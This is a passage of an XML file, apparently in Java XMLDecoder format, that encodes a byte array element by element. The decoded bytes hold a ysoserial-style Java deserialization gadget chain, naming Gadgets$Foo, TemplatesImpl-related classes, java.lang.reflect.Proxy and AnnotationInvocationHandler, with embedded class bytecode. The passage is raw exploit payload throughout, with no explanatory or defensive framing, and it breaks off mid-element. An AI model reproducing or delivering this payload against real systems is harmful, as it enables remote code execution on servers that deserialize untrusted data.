index=\"2518\"><byte>-74</byte></void><void index=\"2519\"><byte>0</byte></void><void index=\"2520\"><byte>56</byte></void><void index=\"2521\"><byte>18</byte></void><void index=\"2522\"><byte>58</byte></void><void index=\"2523\"><byte>-74</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>64</byte></void><void index=\"2526\"><byte>-74</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>70</byte></void><void index=\"2529\"><byte>-74</byte></void><void index=\"2530\"><byte>0</byte></void><void index=\"2531\"><byte>74</byte></void><void index=\"2532\"><byte>18</byte></void><void index=\"2533\"><byte>76</byte></void><void index=\"2534\"><byte>-74</byte></void><void index=\"2535\"><byte>0</byte></void><void index=\"2536\"><byte>74</byte></void><void index=\"2537\"><byte>-74</byte></void><void index=\"2538\"><byte>0</byte></void><void index=\"2539\"><byte>79</byte></void><void index=\"2540\"><byte>-73</byte></void><void index=\"2541\"><byte>0</byte></void><void index=\"2542\"><byte>82</byte></void><void index=\"2543\"><byte>-69</byte></void><void index=\"2544\"><byte>0</byte></void><void index=\"2545\"><byte>84</byte></void><void index=\"2546\"><byte>89</byte></void><void index=\"2547\"><byte>18</byte></void><void index=\"2548\"><byte>86</byte></void><void index=\"2549\"><byte>-73</byte></void><void index=\"2550\"><byte>0</byte></void><void index=\"2551\"><byte>87</byte></void><void index=\"2552\"><byte>-74</byte></void><void index=\"2553\"><byte>0</byte></void><void index=\"2554\"><byte>92</byte></void><void index=\"2555\"><byte>-74</byte></void><void index=\"2556\"><byte>0</byte></void><void index=\"2557\"><byte>95</byte></void><void index=\"2558\"><byte>-79</byte></void><void index=\"2559\"><byte>0</byte></void><void index=\"2560\"><byte>0</byte></void><void index=\"2561\"><byte>0</byte></void><void index=\"2562\"><byte>1</byte></void><void index=\"2563\"><byte>0</byte></void><void index=\"2564\"><byte>96</byte></void><void index=\"2565\"><byte>0</byte></void><void index=\"2566\"><byte>0</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>3</byte></void><void index=\"2569\"><byte>0</byte></void><void index=\"2570\"><byte>1</byte></void><void index=\"2571\"><byte>3</byte></void><void index=\"2572\"><byte>0</byte></void><void index=\"2573\"><byte>2</byte></void><void index=\"2574\"><byte>0</byte></void><void index=\"2575\"><byte>32</byte></void><void index=\"2576\"><byte>0</byte></void><void index=\"2577\"><byte>0</byte></void><void index=\"2578\"><byte>0</byte></void><void index=\"2579\"><byte>2</byte></void><void index=\"2580\"><byte>0</byte></void><void index=\"2581\"><byte>33</byte></void><void index=\"2582\"><byte>0</byte></void><void index=\"2583\"><byte>17</byte></void><void index=\"2584\"><byte>0</byte></void><void index=\"2585\"><byte>0</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>10</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>1</byte></void><void index=\"2590\"><byte>0</byte></void><void index=\"2591\"><byte>2</byte></void><void index=\"2592\"><byte>0</byte></void><void index=\"2593\"><byte>35</byte></void><void index=\"2594\"><byte>0</byte></void><void index=\"2595\"><byte>16</byte></void><void index=\"2596\"><byte>0</byte></void><void index=\"2597\"><byte>9</byte></void><void index=\"2598\"><byte>117</byte></void><void index=\"2599\"><byte>113</byte></void><void index=\"2600\"><byte>0</byte></void><void index=\"2601\"><byte>126</byte></void><void index=\"2602\"><byte>0</byte></void><void index=\"2603\"><byte>11</byte></void><void index=\"2604\"><byte>0</byte></void><void index=\"2605\"><byte>0</byte></void><void index=\"2606\"><byte>1</byte></void><void index=\"2607\"><byte>-44</byte></void><void index=\"2608\"><byte>-54</byte></void><void index=\"2609\"><byte>-2</byte></void><void index=\"2610\"><byte>-70</byte></void><void index=\"2611\"><byte>-66</byte></void><void index=\"2612\"><byte>0</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>0</byte></void><void index=\"2615\"><byte>50</byte></void><void index=\"2616\"><byte>0</byte></void><void index=\"2617\"><byte>27</byte></void><void index=\"2618\"><byte>10</byte></void><void index=\"2619\"><byte>0</byte></void><void index=\"2620\"><byte>3</byte></void><void index=\"2621\"><byte>0</byte></void><void index=\"2622\"><byte>21</byte></void><void index=\"2623\"><byte>7</byte></void><void index=\"2624\"><byte>0</byte></void><void index=\"2625\"><byte>23</byte></void><void index=\"2626\"><byte>7</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>24</byte></void><void index=\"2629\"><byte>7</byte></void><void index=\"2630\"><byte>0</byte></void><void index=\"2631\"><byte>25</byte></void><void index=\"2632\"><byte>1</byte></void><void index=\"2633\"><byte>0</byte></void><void index=\"2634\"><byte>16</byte></void><void index=\"2635\"><byte>115</byte></void><void index=\"2636\"><byte>101</byte></void><void index=\"2637\"><byte>114</byte></void><void index=\"2638\"><byte>105</byte></void><void index=\"2639\"><byte>97</byte></void><void index=\"2640\"><byte>108</byte></void><void index=\"2641\"><byte>86</byte></void><void index=\"2642\"><byte>101</byte></void><void index=\"2643\"><byte>114</byte></void><void index=\"2644\"><byte>115</byte></void><void index=\"2645\"><byte>105</byte></void><void index=\"2646\"><byte>111</byte></void><void index=\"2647\"><byte>110</byte></void><void index=\"2648\"><byte>85</byte></void><void index=\"2649\"><byte>73</byte></void><void index=\"2650\"><byte>68</byte></void><void index=\"2651\"><byte>1</byte></void><void index=\"2652\"><byte>0</byte></void><void index=\"2653\"><byte>1</byte></void><void index=\"2654\"><byte>74</byte></void><void index=\"2655\"><byte>1</byte></void><void index=\"2656\"><byte>0</byte></void><void index=\"2657\"><byte>13</byte></void><void index=\"2658\"><byte>67</byte></void><void index=\"2659\"><byte>111</byte></void><void index=\"2660\"><byte>110</byte></void><void index=\"2661\"><byte>115</byte></void><void index=\"2662\"><byte>116</byte></void><void index=\"2663\"><byte>97</byte></void><void index=\"2664\"><byte>110</byte></void><void index=\"2665\"><byte>116</byte></void><void index=\"2666\"><byte>86</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>108</byte></void><void index=\"2669\"><byte>117</byte></void><void index=\"2670\"><byte>101</byte></void><void index=\"2671\"><byte>5</byte></void><void index=\"2672\"><byte>113</byte></void><void index=\"2673\"><byte>-26</byte></void><void index=\"2674\"><byte>105</byte></void><void index=\"2675\"><byte>-18</byte></void><void index=\"2676\"><byte>60</byte></void><void index=\"2677\"><byte>109</byte></void><void index=\"2678\"><byte>71</byte></void><void index=\"2679\"><byte>24</byte></void><void index=\"2680\"><byte>1</byte></void><void index=\"2681\"><byte>0</byte></void><void index=\"2682\"><byte>6</byte></void><void index=\"2683\"><byte>60</byte></void><void index=\"2684\"><byte>105</byte></void><void index=\"2685\"><byte>110</byte></void><void index=\"2686\"><byte>105</byte></void><void index=\"2687\"><byte>116</byte></void><void index=\"2688\"><byte>62</byte></void><void index=\"2689\"><byte>1</byte></void><void index=\"2690\"><byte>0</byte></void><void index=\"2691\"><byte>3</byte></void><void index=\"2692\"><byte>40</byte></void><void index=\"2693\"><byte>41</byte></void><void index=\"2694\"><byte>86</byte></void><void index=\"2695\"><byte>1</byte></void><void index=\"2696\"><byte>0</byte></void><void index=\"2697\"><byte>4</byte></void><void index=\"2698\"><byte>67</byte></void><void index=\"2699\"><byte>111</byte></void><void index=\"2700\"><byte>100</byte></void><void index=\"2701\"><byte>101</byte></void><void index=\"2702\"><byte>1</byte></void><void index=\"2703\"><byte>0</byte></void><void index=\"2704\"><byte>15</byte></void><void index=\"2705\"><byte>76</byte></void><void index=\"2706\"><byte>105</byte></void><void index=\"2707\"><byte>110</byte></void><void index=\"2708\"><byte>101</byte></void><void index=\"2709\"><byte>78</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>109</byte></void><void index=\"2712\"><byte>98</byte></void><void index=\"2713\"><byte>101</byte></void><void index=\"2714\"><byte>114</byte></void><void index=\"2715\"><byte>84</byte></void><void index=\"2716\"><byte>97</byte></void><void index=\"2717\"><byte>98</byte></void><void index=\"2718\"><byte>108</byte></void><void index=\"2719\"><byte>101</byte></void><void index=\"2720\"><byte>1</byte></void><void index=\"2721\"><byte>0</byte></void><void index=\"2722\"><byte>18</byte></void><void index=\"2723\"><byte>76</byte></void><void index=\"2724\"><byte>111</byte></void><void index=\"2725\"><byte>99</byte></void><void index=\"2726\"><byte>97</byte></void><void index=\"2727\"><byte>108</byte></void><void index=\"2728\"><byte>86</byte></void><void index=\"2729\"><byte>97</byte></void><void index=\"2730\"><byte>114</byte></void><void index=\"2731\"><byte>105</byte></void><void index=\"2732\"><byte>97</byte></void><void index=\"2733\"><byte>98</byte></void><void index=\"2734\"><byte>108</byte></void><void index=\"2735\"><byte>101</byte></void><void index=\"2736\"><byte>84</byte></void><void index=\"2737\"><byte>97</byte></void><void index=\"2738\"><byte>98</byte></void><void index=\"2739\"><byte>108</byte></void><void index=\"2740\"><byte>101</byte></void><void index=\"2741\"><byte>1</byte></void><void index=\"2742\"><byte>0</byte></void><void index=\"2743\"><byte>4</byte></void><void index=\"2744\"><byte>116</byte></void><void index=\"2745\"><byte>104</byte></void><void index=\"2746\"><byte>105</byte></void><void index=\"2747\"><byte>115</byte></void><void index=\"2748\"><byte>1</byte></void><void index=\"2749\"><byte>0</byte></void><void index=\"2750\"><byte>3</byte></void><void index=\"2751\"><byte>70</byte></void><void index=\"2752\"><byte>111</byte></void><void index=\"2753\"><byte>111</byte></void><void index=\"2754\"><byte>1</byte></void><void index=\"2755\"><byte>0</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>73</byte></void><void index=\"2758\"><byte>110</byte></void><void index=\"2759\"><byte>110</byte></void><void index=\"2760\"><byte>101</byte></void><void index=\"2761\"><byte>114</byte></void><void index=\"2762\"><byte>67</byte></void><void index=\"2763\"><byte>108</byte></void><void index=\"2764\"><byte>97</byte></void><void index=\"2765\"><byte>115</byte></void><void index=\"2766\"><byte>115</byte></void><void index=\"2767\"><byte>101</byte></void><void index=\"2768\"><byte>115</byte></void><void index=\"2769\"><byte>1</byte></void><void index=\"2770\"><byte>0</byte></void><void index=\"2771\"><byte>37</byte></void><void index=\"2772\"><byte>76</byte></void><void index=\"2773\"><byte>121</byte></void><void index=\"2774\"><byte>115</byte></void><void index=\"2775\"><byte>111</byte></void><void index=\"2776\"><byte>115</byte></void><void index=\"2777\"><byte>101</byte></void><void index=\"2778\"><byte>114</byte></void><void index=\"2779\"><byte>105</byte></void><void index=\"2780\"><byte>97</byte></void><void index=\"2781\"><byte>108</byte></void><void index=\"2782\"><byte>47</byte></void><void index=\"2783\"><byte>112</byte></void><void index=\"2784\"><byte>97</byte></void><void index=\"2785\"><byte>121</byte></void><void index=\"2786\"><byte>108</byte></void><void index=\"2787\"><byte>111</byte></void><void index=\"2788\"><byte>97</byte></void><void index=\"2789\"><byte>100</byte></void><void index=\"2790\"><byte>115</byte></void><void index=\"2791\"><byte>47</byte></void><void index=\"2792\"><byte>117</byte></void><void index=\"2793\"><byte>116</byte></void><void index=\"2794\"><byte>105</byte></void><void index=\"2795\"><byte>108</byte></void><void index=\"2796\"><byte>47</byte></void><void index=\"2797\"><byte>71</byte></void><void index=\"2798\"><byte>97</byte></void><void index=\"2799\"><byte>100</byte></void><void index=\"2800\"><byte>103</byte></void><void index=\"2801\"><byte>101</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>115</byte></void><void index=\"2804\"><byte>36</byte></void><void index=\"2805\"><byte>70</byte></void><void index=\"2806\"><byte>111</byte></void><void index=\"2807\"><byte>111</byte></void><void index=\"2808\"><byte>59</byte></void><void index=\"2809\"><byte>1</byte></void><void index=\"2810\"><byte>0</byte></void><void index=\"2811\"><byte>10</byte></void><void index=\"2812\"><byte>83</byte></void><void index=\"2813\"><byte>111</byte></void><void index=\"2814\"><byte>117</byte></void><void index=\"2815\"><byte>114</byte></void><void index=\"2816\"><byte>99</byte></void><void index=\"2817\"><byte>101</byte></void><void index=\"2818\"><byte>70</byte></void><void index=\"2819\"><byte>105</byte></void><void index=\"2820\"><byte>108</byte></void><void index=\"2821\"><byte>101</byte></void><void index=\"2822\"><byte>1</byte></void><void index=\"2823\"><byte>0</byte></void><void index=\"2824\"><byte>12</byte></void><void index=\"2825\"><byte>71</byte></void><void index=\"2826\"><byte>97</byte></void><void index=\"2827\"><byte>100</byte></void><void index=\"2828\"><byte>103</byte></void><void index=\"2829\"><byte>101</byte></void><void index=\"2830\"><byte>116</byte></void><void index=\"2831\"><byte>115</byte></void><void index=\"2832\"><byte>46</byte></void><void index=\"2833\"><byte>106</byte></void><void index=\"2834\"><byte>97</byte></void><void index=\"2835\"><byte>118</byte></void><void index=\"2836\"><byte>97</byte></void><void index=\"2837\"><byte>12</byte></void><void index=\"2838\"><byte>0</byte></void><void index=\"2839\"><byte>10</byte></void><void index=\"2840\"><byte>0</byte></void><void index=\"2841\"><byte>11</byte></void><void index=\"2842\"><byte>7</byte></void><void index=\"2843\"><byte>0</byte></void><void index=\"2844\"><byte>26</byte></void><void index=\"2845\"><byte>1</byte></void><void index=\"2846\"><byte>0</byte></void><void index=\"2847\"><byte>35</byte></void><void index=\"2848\"><byte>121</byte></void><void index=\"2849\"><byte>115</byte></void><void index=\"2850\"><byte>111</byte></void><void index=\"2851\"><byte>115</byte></void><void index=\"2852\"><byte>101</byte></void><void index=\"2853\"><byte>114</byte></void><void index=\"2854\"><byte>105</byte></void><void index=\"2855\"><byte>97</byte></void><void index=\"2856\"><byte>108</byte></void><void index=\"2857\"><byte>47</byte></void><void index=\"2858\"><byte>112</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>121</byte></void><void index=\"2861\"><byte>108</byte></void><void index=\"2862\"><byte>111</byte></void><void index=\"2863\"><byte>97</byte></void><void index=\"2864\"><byte>100</byte></void><void index=\"2865\"><byte>115</byte></void><void index=\"2866\"><byte>47</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>116</byte></void><void index=\"2869\"><byte>105</byte></void><void index=\"2870\"><byte>108</byte></void><void index=\"2871\"><byte>47</byte></void><void index=\"2872\"><byte>71</byte></void><void index=\"2873\"><byte>97</byte></void><void index=\"2874\"><byte>100</byte></void><void index=\"2875\"><byte>103</byte></void><void index=\"2876\"><byte>101</byte></void><void index=\"2877\"><byte>116</byte></void><void index=\"2878\"><byte>115</byte></void><void index=\"2879\"><byte>36</byte></void><void index=\"2880\"><byte>70</byte></void><void index=\"2881\"><byte>111</byte></void><void index=\"2882\"><byte>111</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>16</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>108</byte></void><void index=\"2892\"><byte>97</byte></void><void index=\"2893\"><byte>110</byte></void><void index=\"2894\"><byte>103</byte></void><void index=\"2895\"><byte>47</byte></void><void index=\"2896\"><byte>79</byte></void><void index=\"2897\"><byte>98</byte></void><void index=\"2898\"><byte>106</byte></void><void index=\"2899\"><byte>101</byte></void><void index=\"2900\"><byte>99</byte></void><void index=\"2901\"><byte>116</byte></void><void index=\"2902\"><byte>1</byte></void><void index=\"2903\"><byte>0</byte></void><void index=\"2904\"><byte>20</byte></void><void index=\"2905\"><byte>106</byte></void><void index=\"2906\"><byte>97</byte></void><void index=\"2907\"><byte>118</byte></void><void index=\"2908\"><byte>97</byte></void><void index=\"2909\"><byte>47</byte></void><void index=\"2910\"><byte>105</byte></void><void index=\"2911\"><byte>111</byte></void><void index=\"2912\"><byte>47</byte></void><void index=\"2913\"><byte>83</byte></void><void index=\"2914\"><byte>101</byte></void><void index=\"2915\"><byte>114</byte></void><void index=\"2916\"><byte>105</byte></void><void index=\"2917\"><byte>97</byte></void><void index=\"2918\"><byte>108</byte></void><void index=\"2919\"><byte>105</byte></void><void index=\"2920\"><byte>122</byte></void><void index=\"2921\"><byte>97</byte></void><void index=\"2922\"><byte>98</byte></void><void index=\"2923\"><byte>108</byte></void><void index=\"2924\"><byte>101</byte></void><void index=\"2925\"><byte>1</byte></void><void index=\"2926\"><byte>0</byte></void><void index=\"2927\"><byte>31</byte></void><void index=\"2928\"><byte>121</byte></void><void index=\"2929\"><byte>115</byte></void><void index=\"2930\"><byte>111</byte></void><void index=\"2931\"><byte>115</byte></void><void index=\"2932\"><byte>101</byte></void><void index=\"2933\"><byte>114</byte></void><void index=\"2934\"><byte>105</byte></void><void index=\"2935\"><byte>97</byte></void><void index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void 